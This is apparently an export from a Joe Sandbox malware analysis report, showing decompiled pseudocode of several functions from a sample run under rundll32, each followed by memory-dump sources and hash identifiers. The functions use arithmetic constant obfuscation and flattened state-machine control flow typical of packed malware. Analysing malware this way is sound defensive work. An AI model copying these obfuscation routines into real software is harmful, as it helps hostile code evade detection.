                                                                                                                                  				_v584 = _v584 | 0xaacebf86;
                                                                                                                                  				_v584 = _v584 ^ 0xabd4b38c;
                                                                                                                                  				_v556 = 0xa4c35b;
                                                                                                                                  				_v556 = _v556 / _t189;
                                                                                                                                  				_v556 = _v556 | 0xf6aeb391;
                                                                                                                                  				_v556 = _v556 ^ 0xf6ac7ee7;
                                                                                                                                  				_v536 = 0xf31b8a;
                                                                                                                                  				_v536 = _v536 | 0x87603e20;
                                                                                                                                  				_v536 = _v536 ^ 0x87f7aca9;
                                                                                                                                  				_v576 = 0x423791;
                                                                                                                                  				_v576 = _v576 + 0xffffb580;
                                                                                                                                  				_v576 = _v576 + 0x7a73;
                                                                                                                                  				_v576 = _v576 ^ 0x7a6e2c80;
                                                                                                                                  				_v576 = _v576 ^ 0x7a24ad4c;
                                                                                                                                  				_v544 = 0x7ccdad;
                                                                                                                                  				_v544 = _v544 << 7;
                                                                                                                                  				_v544 = _v544 ^ 0x3e66d3ae;
                                                                                                                                  				_v572 = 0x1eeccc;
                                                                                                                                  				_v572 = _v572 | 0x2c9b1d75;
                                                                                                                                  				_v572 = _v572 << 6;
                                                                                                                                  				_t190 = 0x5b;
                                                                                                                                  				_v572 = _v572 / _t190;
                                                                                                                                  				_v572 = _v572 ^ 0x007e2283;
                                                                                                                                  				_v552 = 0x119b6d;
                                                                                                                                  				_t191 = 0x5a;
                                                                                                                                  				_v552 = _v552 / _t191;
                                                                                                                                  				_v552 = _v552 ^ 0xceecc8a8;
                                                                                                                                  				_v552 = _v552 ^ 0xceebe4d8;
                                                                                                                                  				_v580 = 0x5ef79f;
                                                                                                                                  				_v580 = _v580 / _t187;
                                                                                                                                  				_v580 = _v580 | 0x8cf80c97;
                                                                                                                                  				_t192 = 0x3d;
                                                                                                                                  				_v580 = _v580 / _t192;
                                                                                                                                  				_v580 = _v580 ^ 0x02499ffb;
                                                                                                                                  				do {
                                                                                                                                  					while(_t168 != 0xc65bb2) {
                                                                                                                                  						if(_t168 == 0x63f282e) {
                                                                                                                                  							_t162 = E002EDA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
                                                                                                                                  							_t197 =  &(_t197[4]);
                                                                                                                                  							_t168 = 0xc65bb2;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t168 == 0xb3c9692) {
                                                                                                                                  							_t164 =  *0x2f3e10; // 0x0
                                                                                                                                  							__eflags = _t164 + 0x1c;
                                                                                                                                  							return E002D3BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
                                                                                                                                  						}
                                                                                                                                  						if(_t168 != 0xe71c2f1) {
                                                                                                                                  							goto L15;
                                                                                                                                  						}
                                                                                                                                  						_t168 = 0x63f282e;
                                                                                                                                  					}
                                                                                                                                  					_v564 = 0x8b8c25;
                                                                                                                                  					_v564 = _v564 * 0x78;
                                                                                                                                  					_v564 = _v564 + 0xffff9cfb;
                                                                                                                                  					_v564 = _v564 ^ 0x41694e51;
                                                                                                                                  					_t161 = E002DCB52(_v584,  &_v520, _v556, _v536, _v576);
                                                                                                                                  					_t197 =  &(_t197[3]);
                                                                                                                                  					_t195 =  &_v520 + _t161 * 2;
                                                                                                                                  					while(1) {
                                                                                                                                  						_t162 =  &_v520;
                                                                                                                                  						__eflags = _t195 - _t162;
                                                                                                                                  						if(_t195 <= _t162) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						__eflags =  *_t195 - 0x5c;
                                                                                                                                  						if( *_t195 != 0x5c) {
                                                                                                                                  							L10:
                                                                                                                                  							_t195 = _t195 - 2;
                                                                                                                                  							__eflags = _t195;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						_t139 =  &_v564;
                                                                                                                                  						 *_t139 = _v564 - 1;
                                                                                                                                  						__eflags =  *_t139;
                                                                                                                                  						if( *_t139 == 0) {
                                                                                                                                  							__eflags = _t195;
                                                                                                                                  							L14:
                                                                                                                                  							_t168 = 0xb3c9692;
                                                                                                                                  							goto L15;
                                                                                                                                  						}
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					goto L14;
                                                                                                                                  					L15:
                                                                                                                                  					__eflags = _t168 - 0x6143c47;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				return _t162;
                                                                                                                                  			}


                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: QNiA$sz
                                                                                                                                  • API String ID: 0-294658094
                                                                                                                                  • Opcode ID: 0e8f295be2ae595fc7657dcb850da5c1e175ccdcfe44f612fde8b60dfd5feccf
                                                                                                                                  • Instruction ID: 6b549235e151d4decf83ec7563ac632297b9ab2c0b92d2b657d91c0ff1ed79f4
                                                                                                                                  • Opcode Fuzzy Hash: 0e8f295be2ae595fc7657dcb850da5c1e175ccdcfe44f612fde8b60dfd5feccf
                                                                                                                                  • Instruction Fuzzy Hash: D0715231519341ABD398CF26D98581FFBF1FBC4718F40491EF596A6260D3B48A098F83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002E0B19(void* __ecx) {
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				intOrPtr _v72;
                                                                                                                                  				void* _t160;
                                                                                                                                  				void* _t164;
                                                                                                                                  				signed int _t166;
                                                                                                                                  				signed int _t167;
                                                                                                                                  				signed int _t168;
                                                                                                                                  				signed int _t169;
                                                                                                                                  				signed int _t170;
                                                                                                                                  				intOrPtr _t190;
                                                                                                                                  				intOrPtr* _t191;
                                                                                                                                  				intOrPtr* _t192;
                                                                                                                                  				signed int* _t194;
                                                                                                                                  
                                                                                                                                  				_t194 =  &_v68;
                                                                                                                                  				_v12 = 0xec215;
                                                                                                                                  				_v8 = 0x867af3;
                                                                                                                                  				_t190 =  *0x2f3208; // 0x0
                                                                                                                                  				_v4 = 0;
                                                                                                                                  				_t164 = __ecx;
                                                                                                                                  				_v64 = 0x2d9572;
                                                                                                                                  				_t191 = _t190 + 0x20c;
                                                                                                                                  				_v64 = _v64 + 0xffff7051;
                                                                                                                                  				_v64 = _v64 ^ 0xb4c09ebb;
                                                                                                                                  				_v64 = _v64 | 0x08f8e0e6;
                                                                                                                                  				_v64 = _v64 ^ 0xbcfdfbfe;
                                                                                                                                  				_v40 = 0xaf9231;
                                                                                                                                  				_v40 = _v40 + 0x3789;
                                                                                                                                  				_v40 = _v40 + 0x1acf;
                                                                                                                                  				_v40 = _v40 ^ 0x00adbfc0;
                                                                                                                                  				_v68 = 0xf5f340;
                                                                                                                                  				_v68 = _v68 ^ 0x3b0075db;
                                                                                                                                  				_v68 = _v68 >> 1;
                                                                                                                                  				_v68 = _v68 + 0xaae2;
                                                                                                                                  				_v68 = _v68 ^ 0x1dff90e5;
                                                                                                                                  				_v24 = 0xe1803e;
                                                                                                                                  				_v24 = _v24 + 0x946c;
                                                                                                                                  				_v24 = _v24 ^ 0x00ebebe2;
                                                                                                                                  				_v44 = 0xcb8087;
                                                                                                                                  				_t166 = 0x7f;
                                                                                                                                  				_v44 = _v44 / _t166;
                                                                                                                                  				_v44 = _v44 << 5;
                                                                                                                                  				_v44 = _v44 ^ 0x00394faa;
                                                                                                                                  				_v32 = 0x6e7c9c;
                                                                                                                                  				_v32 = _v32 << 0xf;
                                                                                                                                  				_v32 = _v32 >> 6;
                                                                                                                                  				_v32 = _v32 ^ 0x00f599ec;
                                                                                                                                  				_v36 = 0x8d7ece;
                                                                                                                                  				_v36 = _v36 + 0xd96f;
                                                                                                                                  				_v36 = _v36 + 0x3e8b;
                                                                                                                                  				_v36 = _v36 ^ 0x008d6b01;
                                                                                                                                  				_v60 = 0x740a18;
                                                                                                                                  				_v60 = _v60 + 0x5af6;
                                                                                                                                  				_t167 = 0x2d;
                                                                                                                                  				_v60 = _v60 / _t167;
                                                                                                                                  				_t168 = 0xc;
                                                                                                                                  				_v60 = _v60 / _t168;
                                                                                                                                  				_v60 = _v60 ^ 0x000f4a79;
                                                                                                                                  				_v48 = 0xecd979;
                                                                                                                                  				_v48 = _v48 + 0xffff2496;
                                                                                                                                  				_t169 = 3;
                                                                                                                                  				_v48 = _v48 / _t169;
                                                                                                                                  				_v48 = _v48 ^ 0xbc9c03a4;
                                                                                                                                  				_v48 = _v48 ^ 0xbcdb2390;
                                                                                                                                  				_v52 = 0x17ff93;
                                                                                                                                  				_v52 = _v52 << 0xd;
                                                                                                                                  				_v52 = _v52 + 0x3109;
                                                                                                                                  				_v52 = _v52 ^ 0x7590f195;
                                                                                                                                  				_v52 = _v52 ^ 0x8a641707;
                                                                                                                                  				_v20 = 0x28811b;
                                                                                                                                  				_v20 = _v20 * 0x25;
                                                                                                                                  				_v20 = _v20 ^ 0x05ddec85;
                                                                                                                                  				_v56 = 0x23ad29;
                                                                                                                                  				_t170 = 0x5a;
                                                                                                                                  				_v56 = _v56 / _t170;
                                                                                                                                  				_v56 = _v56 >> 8;
                                                                                                                                  				_v56 = _v56 ^ 0x06fabbcf;
                                                                                                                                  				_v56 = _v56 ^ 0x06fdb2ad;
                                                                                                                                  				_v28 = 0x8d9789;
                                                                                                                                  				_v28 = _v28 | 0x3813f7c3;
                                                                                                                                  				_v28 = _v28 + 0xa24c;
                                                                                                                                  				_v28 = _v28 ^ 0x38ab2d0e;
                                                                                                                                  				_v16 = 0x83a12;
                                                                                                                                  				_v16 = _v16 << 0xb;
                                                                                                                                  				_v16 = _v16 ^ 0x41de3db0;
                                                                                                                                  				while(1) {
                                                                                                                                  					_t192 =  *_t191;
                                                                                                                                  					if(_t192 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
                                                                                                                                  						L4:
                                                                                                                                  						 *_t191 =  *_t192;
                                                                                                                                  						_t160 = E002E8519(_v28, _v16, _t192);
                                                                                                                                  					} else {
                                                                                                                                  						_t133 =  &_v40; // 0xebebe2
                                                                                                                                  						_t160 = E002D8DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
                                                                                                                                  						_t194 =  &(_t194[4]);
                                                                                                                                  						if(_t160 != _v64) {
                                                                                                                                  							_t191 = _t192;
                                                                                                                                  						} else {
                                                                                                                                  							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
                                                                                                                                  							E002E9E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
                                                                                                                                  							E002E1E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
                                                                                                                                  							_t194 =  &(_t194[5]);
                                                                                                                                  							goto L4;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t160;
                                                                                                                                  			}
































                                                                                                                                  0x002e0d45
                                                                                                                                  0x002e0d4a
                                                                                                                                  0x002e0d51
                                                                                                                                  0x002e0dab
                                                                                                                                  0x002e0d53
                                                                                                                                  0x002e0d58
                                                                                                                                  0x002e0d6a
                                                                                                                                  0x002e0d82
                                                                                                                                  0x002e0d87
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0d87
                                                                                                                                  0x002e0d51
                                                                                                                                  0x002e0d2f
                                                                                                                                  0x002e0daa

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 1$
                                                                                                                                  • API String ID: 0-209397207
                                                                                                                                  • Opcode ID: e99963dbd4b7fb98b1d75064bb86f5b5f5052d56add79c6ac94e3a6c514d2108
                                                                                                                                  • Instruction ID: da392522bedf86dc631b4beb273e5faad3b3d887254fa7affd21acca7dae4529
                                                                                                                                  • Opcode Fuzzy Hash: e99963dbd4b7fb98b1d75064bb86f5b5f5052d56add79c6ac94e3a6c514d2108
                                                                                                                                  • Instruction Fuzzy Hash: 35612FB15083419FC394CF22D48940BBBF1FBC9768F509A1DF19A92260D7B1DA5ACF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002DAEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                                  				char _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				void* _t116;
                                                                                                                                  				void* _t130;
                                                                                                                                  				intOrPtr _t133;
                                                                                                                                  				void* _t137;
                                                                                                                                  				intOrPtr* _t154;
                                                                                                                                  				void* _t155;
                                                                                                                                  				signed int _t156;
                                                                                                                                  				signed int _t157;
                                                                                                                                  				signed int _t158;
                                                                                                                                  				signed int _t159;
                                                                                                                                  				void* _t161;
                                                                                                                                  				void* _t162;
                                                                                                                                  
                                                                                                                                  				_t135 = _a12;
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_t154 = __ecx;
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t116);
                                                                                                                                  				_v44 = 0xe8605f;
                                                                                                                                  				_t162 = _t161 + 0x18;
                                                                                                                                  				_v44 = _v44 + 0x84a0;
                                                                                                                                  				_v44 = _v44 ^ 0x00e8e4ff;
                                                                                                                                  				_t155 = 0;
                                                                                                                                  				_v68 = 0xe00e28;
                                                                                                                                  				_t137 = 0xc99b7e9;
                                                                                                                                  				_v68 = _v68 << 9;
                                                                                                                                  				_v68 = _v68 << 2;
                                                                                                                                  				_t156 = 0x3b;
                                                                                                                                  				_v68 = _v68 / _t156;
                                                                                                                                  				_v68 = _v68 ^ 0x0001eb63;
                                                                                                                                  				_v76 = 0x5a4023;
                                                                                                                                  				_v76 = _v76 >> 0xf;
                                                                                                                                  				_t157 = 0x5b;
                                                                                                                                  				_v76 = _v76 * 0x13;
                                                                                                                                  				_v76 = _v76 ^ 0x64c481b8;
                                                                                                                                  				_v76 = _v76 ^ 0x64ccd277;
                                                                                                                                  				_v64 = 0xe36df4;
                                                                                                                                  				_v64 = _v64 / _t157;
                                                                                                                                  				_t158 = 9;
                                                                                                                                  				_v64 = _v64 * 0x52;
                                                                                                                                  				_v64 = _v64 ^ 0x00c8b522;
                                                                                                                                  				_v80 = 0x952e3b;
                                                                                                                                  				_v80 = _v80 >> 6;
                                                                                                                                  				_v80 = _v80 ^ 0xc023484e;
                                                                                                                                  				_v80 = _v80 / _t158;
                                                                                                                                  				_v80 = _v80 ^ 0x155df6ec;
                                                                                                                                  				_v72 = 0x4bfcfc;
                                                                                                                                  				_v72 = _v72 | 0x0a339af0;
                                                                                                                                  				_v72 = _v72 << 0xf;
                                                                                                                                  				_t159 = 0x12;
                                                                                                                                  				_v72 = _v72 / _t159;
                                                                                                                                  				_v72 = _v72 ^ 0x0e3e5ce5;
                                                                                                                                  				_v40 = 0xc0630c;
                                                                                                                                  				_v40 = _v40 | 0x5d0d844d;
                                                                                                                                  				_v40 = _v40 ^ 0x5dc4e99c;
                                                                                                                                  				_v52 = 0x98b7b;
                                                                                                                                  				_v52 = _v52 + 0xa105;
                                                                                                                                  				_v52 = _v52 >> 5;
                                                                                                                                  				_v52 = _v52 ^ 0x0004c78d;
                                                                                                                                  				_v56 = 0xd0814a;
                                                                                                                                  				_v56 = _v56 >> 9;
                                                                                                                                  				_v56 = _v56 * 0x3e;
                                                                                                                                  				_v56 = _v56 ^ 0x001a31dc;
                                                                                                                                  				_v60 = 0xb9e1cb;
                                                                                                                                  				_v60 = _v60 * 0x25;
                                                                                                                                  				_v60 = _v60 << 0xa;
                                                                                                                                  				_v60 = _v60 ^ 0x768204a8;
                                                                                                                                  				_v48 = 0xccd34a;
                                                                                                                                  				_v48 = _v48 + 0xffff20ce;
                                                                                                                                  				_v48 = _v48 ^ 0x00ce4dff;
                                                                                                                                  				do {
                                                                                                                                  					while(_t137 != 0x8f26e2d) {
                                                                                                                                  						if(_t137 == 0xc99b7e9) {
                                                                                                                                  							_t137 = 0x8f26e2d;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t137 != 0xfe1ef29) {
                                                                                                                                  								goto L10;
                                                                                                                                  							} else {
                                                                                                                                  								_t133 =  *0x2f3dfc; // 0x0
                                                                                                                                  								E002EE274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
                                                                                                                                  								_t155 =  ==  ? 1 : _t155;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L5:
                                                                                                                                  						return _t155;
                                                                                                                                  					}
                                                                                                                                  					_push( *_t154);
                                                                                                                                  					_t130 = E002EAE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
                                                                                                                                  					_t162 = _t162 + 0x14;
                                                                                                                                  					if(_t130 == 0) {
                                                                                                                                  						_t137 = 0xeaa5f76;
                                                                                                                                  						goto L10;
                                                                                                                                  					} else {
                                                                                                                                  						_t137 = 0xfe1ef29;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L5;
                                                                                                                                  					L10:
                                                                                                                                  				} while (_t137 != 0xeaa5f76);
                                                                                                                                  				goto L5;
                                                                                                                                  			}



























                                                                                                                                  0x002db08b
                                                                                                                                  0x002db093
                                                                                                                                  0x002db09b
                                                                                                                                  0x002db09b
                                                                                                                                  0x002db0a5
                                                                                                                                  0x002db101
                                                                                                                                  0x00000000
                                                                                                                                  0x002db0a7
                                                                                                                                  0x002db0ad
                                                                                                                                  0x00000000
                                                                                                                                  0x002db0b3
                                                                                                                                  0x002db0bc
                                                                                                                                  0x002db0e3
                                                                                                                                  0x002db0f4
                                                                                                                                  0x002db0f4
                                                                                                                                  0x002db0ad
                                                                                                                                  0x002db0f8
                                                                                                                                  0x002db100
                                                                                                                                  0x002db100
                                                                                                                                  0x002db105
                                                                                                                                  0x002db11b
                                                                                                                                  0x002db120
                                                                                                                                  0x002db125
                                                                                                                                  0x002db131
                                                                                                                                  0x00000000
                                                                                                                                  0x002db127
                                                                                                                                  0x002db127
                                                                                                                                  0x00000000
                                                                                                                                  0x002db127
                                                                                                                                  0x00000000
                                                                                                                                  0x002db136
                                                                                                                                  0x002db136
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #@Z$_`
                                                                                                                                  • API String ID: 0-2586238014
                                                                                                                                  • Opcode ID: 51228a1b975fa769e0ceadba2942e3e08d5494dea2a1bb14eaff08e762942ecf
                                                                                                                                  • Instruction ID: 96a6bb9cd180838338f01f060781a2debc7fba6d5a5144189b9820c269b255e9
                                                                                                                                  • Opcode Fuzzy Hash: 51228a1b975fa769e0ceadba2942e3e08d5494dea2a1bb14eaff08e762942ecf
                                                                                                                                  • Instruction Fuzzy Hash: B75125711083409FC718CF22C88A81BBBE1FBD8758F549A1DF59696260C3B2CA59CF46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002DDFF3() {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				intOrPtr _t128;
                                                                                                                                  				intOrPtr _t131;
                                                                                                                                  				signed int _t133;
                                                                                                                                  				signed int _t134;
                                                                                                                                  				intOrPtr _t135;
                                                                                                                                  				void* _t143;
                                                                                                                                  				void* _t146;
                                                                                                                                  				signed int* _t148;
                                                                                                                                  
                                                                                                                                  				_t148 =  &_v52;
                                                                                                                                  				_v12 = 0xa1a716;
                                                                                                                                  				_v12 = _v12 + 0x2188;
                                                                                                                                  				_v12 = _v12 ^ 0x00a02056;
                                                                                                                                  				_v32 = 0x472a3;
                                                                                                                                  				_v32 = _v32 + 0x22e5;
                                                                                                                                  				_v32 = _v32 ^ 0xff9fab52;
                                                                                                                                  				_v32 = _v32 ^ 0xff9c5b0a;
                                                                                                                                  				_v48 = 0x9a7516;
                                                                                                                                  				_v48 = _v48 + 0xffff4702;
                                                                                                                                  				_v48 = _v48 * 0x45;
                                                                                                                                  				_v48 = _v48 + 0xffff2ff5;
                                                                                                                                  				_t146 = 0x4903f33;
                                                                                                                                  				_v48 = _v48 ^ 0x296ff1ed;
                                                                                                                                  				_v16 = 0xfa3b71;
                                                                                                                                  				_v16 = _v16 << 9;
                                                                                                                                  				_v16 = _v16 ^ 0xf47f6bba;
                                                                                                                                  				_v20 = 0xc0b9b;
                                                                                                                                  				_t133 = 0x7b;
                                                                                                                                  				_v20 = _v20 * 0x52;
                                                                                                                                  				_v20 = _v20 ^ 0x03d2ca7d;
                                                                                                                                  				_v36 = 0x400b3e;
                                                                                                                                  				_v36 = _v36 ^ 0xba288636;
                                                                                                                                  				_v36 = _v36 ^ 0xc4c376ba;
                                                                                                                                  				_v36 = _v36 ^ 0x7eaacb92;
                                                                                                                                  				_v52 = 0x3419b2;
                                                                                                                                  				_v52 = _v52 / _t133;
                                                                                                                                  				_v52 = _v52 >> 0xc;
                                                                                                                                  				_v52 = _v52 | 0xcef26f8a;
                                                                                                                                  				_v52 = _v52 ^ 0xcef1d6cf;
                                                                                                                                  				_v4 = 0xb26f64;
                                                                                                                                  				_t134 = 3;
                                                                                                                                  				_v4 = _v4 / _t134;
                                                                                                                                  				_v4 = _v4 ^ 0x003ff5cc;
                                                                                                                                  				_v40 = 0x34a33d;
                                                                                                                                  				_v40 = _v40 >> 4;
                                                                                                                                  				_v40 = _v40 ^ 0xd21b54bd;
                                                                                                                                  				_v40 = _v40 ^ 0x33ae4ce0;
                                                                                                                                  				_v40 = _v40 ^ 0xe1b00bb7;
                                                                                                                                  				_v8 = 0x4c76b4;
                                                                                                                                  				_v8 = _v8 << 2;
                                                                                                                                  				_v8 = _v8 ^ 0x013e4034;
                                                                                                                                  				_v24 = 0x1c9e42;
                                                                                                                                  				_v24 = _v24 ^ 0x4f10b4b5;
                                                                                                                                  				_v24 = _v24 << 4;
                                                                                                                                  				_v24 = _v24 ^ 0xf0cd9088;
                                                                                                                                  				_v44 = 0xfe69b1;
                                                                                                                                  				_v44 = _v44 >> 0xd;
                                                                                                                                  				_v44 = _v44 * 0x49;
                                                                                                                                  				_v44 = _v44 * 0x7d;
                                                                                                                                  				_v44 = _v44 ^ 0x011db47c;
                                                                                                                                  				_v28 = 0x46ec28;
                                                                                                                                  				_v28 = _v28 << 9;
                                                                                                                                  				_v28 = _v28 * 0x58;
                                                                                                                                  				_v28 = _v28 ^ 0xc2551a85;
                                                                                                                                  				_t135 =  *0x2f3e0c; // 0x0
                                                                                                                                  				do {
                                                                                                                                  					while(_t146 != 0x4903f33) {
                                                                                                                                  						if(_t146 == 0x6f617aa) {
                                                                                                                                  							_t128 = E002D46BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E002D81B7, _v28);
                                                                                                                                  							_t135 =  *0x2f3e0c; // 0x0
                                                                                                                                  							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t146 != 0xc69f0b3) {
                                                                                                                                  								goto L6;
                                                                                                                                  							} else {
                                                                                                                                  								_t131 = E002D7AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
                                                                                                                                  								_t135 =  *0x2f3e0c; // 0x0
                                                                                                                                  								_t148 =  &(_t148[6]);
                                                                                                                                  								_t146 = 0x6f617aa;
                                                                                                                                  								 *((intOrPtr*)(_t135 + 8)) = _t131;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L9:
                                                                                                                                  						return 0 | _t135 != 0x00000000;
                                                                                                                                  					}
                                                                                                                                  					_push(_t135);
                                                                                                                                  					_push(_t135);
                                                                                                                                  					_t143 = 0x24;
                                                                                                                                  					_t135 = E002D7FF2(_t143);
                                                                                                                                  					_t146 = 0xc69f0b3;
                                                                                                                                  					 *0x2f3e0c = _t135;
                                                                                                                                  					L6:
                                                                                                                                  				} while (_t146 != 0xab42793);
                                                                                                                                  				goto L9;
                                                                                                                                  			}
























                                                                                                                                  0x002de177
                                                                                                                                  0x002de17b
                                                                                                                                  0x002de183
                                                                                                                                  0x002de18b
                                                                                                                                  0x002de195
                                                                                                                                  0x002de199
                                                                                                                                  0x002de1a1
                                                                                                                                  0x002de1a7
                                                                                                                                  0x002de1a7
                                                                                                                                  0x002de1ad
                                                                                                                                  0x002de229
                                                                                                                                  0x002de22e
                                                                                                                                  0x002de237
                                                                                                                                  0x002de1af
                                                                                                                                  0x002de1b1
                                                                                                                                  0x00000000
                                                                                                                                  0x002de1b3
                                                                                                                                  0x002de1c6
                                                                                                                                  0x002de1cb
                                                                                                                                  0x002de1d1
                                                                                                                                  0x002de1d4
                                                                                                                                  0x002de1d6
                                                                                                                                  0x00000000
                                                                                                                                  0x002de1d6
                                                                                                                                  0x002de1b1
                                                                                                                                  0x002de23b
                                                                                                                                  0x002de248
                                                                                                                                  0x002de248
                                                                                                                                  0x002de1e7
                                                                                                                                  0x002de1e8
                                                                                                                                  0x002de1eb
                                                                                                                                  0x002de1f3
                                                                                                                                  0x002de1f5
                                                                                                                                  0x002de1f7
                                                                                                                                  0x002de1fd
                                                                                                                                  0x002de1fd
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (F$"
                                                                                                                                  • API String ID: 0-1034852068
                                                                                                                                  • Opcode ID: a655f382500aa22aac7b589309d5849d9024bcd9f3a5bd9abff18b30734844e3
                                                                                                                                  • Instruction ID: 7a44c2693a8101c45e2934f3f188d51ad5adcde8c58c8c0379c04fcbc6ca5ef4
                                                                                                                                  • Opcode Fuzzy Hash: a655f382500aa22aac7b589309d5849d9024bcd9f3a5bd9abff18b30734844e3
                                                                                                                                  • Instruction Fuzzy Hash: A95144B15093019FC358DF25D58A80FBBE1EB84B58F10891EF599AA260D3B1DA09CF97
